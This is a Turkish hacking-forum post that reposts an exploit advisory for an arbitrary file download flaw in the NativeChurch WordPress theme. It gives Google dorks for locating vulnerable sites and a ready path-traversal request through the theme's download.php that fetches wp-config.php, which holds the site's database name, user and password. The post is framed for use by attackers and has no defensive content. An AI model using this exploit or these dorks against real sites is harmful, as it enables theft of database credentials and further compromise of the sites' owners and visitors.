Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...


WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 27-02-2019 18:57   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
01/2019
Nereden
Ludas.py
Yaş
19
Mesajlar
Konular

Teşekkür (Etti): 26
Teşekkür (Aldı): 36


WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download



################################################## ##################

# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link :
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x
Compatible with Bootstrap 3.x - bbPress 2.5.x
From WooCommerce 2.1.x To WooCommerce 3.4.x,
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
inurl:''inurl:/wp-content/themes/NativeChurch/download/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : packetstormsecurity.com/files/151851/WordPress-NativeChurch-Multi-Purpose-5.0.x-File-Download.html


################################################## ##################

# Yazılım hakkında açıklama :
***************************

NativeChurch, kilise için tasarlanmış ve geliştirilmiş güçlü bir WordPress Temasıdır,

Sadaka, kar amacı gütmeyen ve dini Web siteleri ve kullanışlı geliyor

portföy / kurumsal web siteleri için de.


################################################## ##################

# Etki :
***********
* * Wordpress için yerel kilise teması, saldırganlara izin veren bir güvenlik açığına eğilimli

uygulama, kullanıcı tarafından sağlanan girişi yeterince sterilize etmediğinden keyfi dosyaları indirin.

Bir saldırgan, bağlam içindeki keyfi dosyaları indirmek için bu sorunu kullanabilir

Web sunucusu işleminin. Elde edilen bilgiler daha fazla saldırıda yardımcı olabilir.

Saldırganlar bu sorunu kullanmak için bir tarayıcı kullanabilir.

* Yazılım içinde olması gereken bir yol adı oluşturmak için harici giriş kullanır

kısıtlı dizin, ancak dizileri düzgün bir şekilde nötralize etmez

mesela." ."bu, bu dizinin dışındaki bir konuma giderilebilir.


################################################## ##################


# Keyfi dosya indirme :

******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php

# MySQL Wordpress yapılandırma dosyası hakkında örnek bilgiler :
************************************************** *********
/** Nom de la base de données de WordPress. */
define('DB_NAME',

/** Utilisateur de la base de données MySQL. */
define('DB_USER',

/** Mot de passe de la base de données MySQL. */
define('DB_PASSWORD',

/** Adresse de l'hébergement MySQL. */
define('DB_HOST',


################################################## #################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################## ##################


Exploit : https://cxsecurity.com/issue/WLB-2019020279



___________________________________________


|~ Yalnızlık olsun istediğin, uzaya mahkum ederim. ~|

Telegram ⋟ @Ludas_THT

|~ Vaktimiz doldu, artık gözlerin kapalı. ~|
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau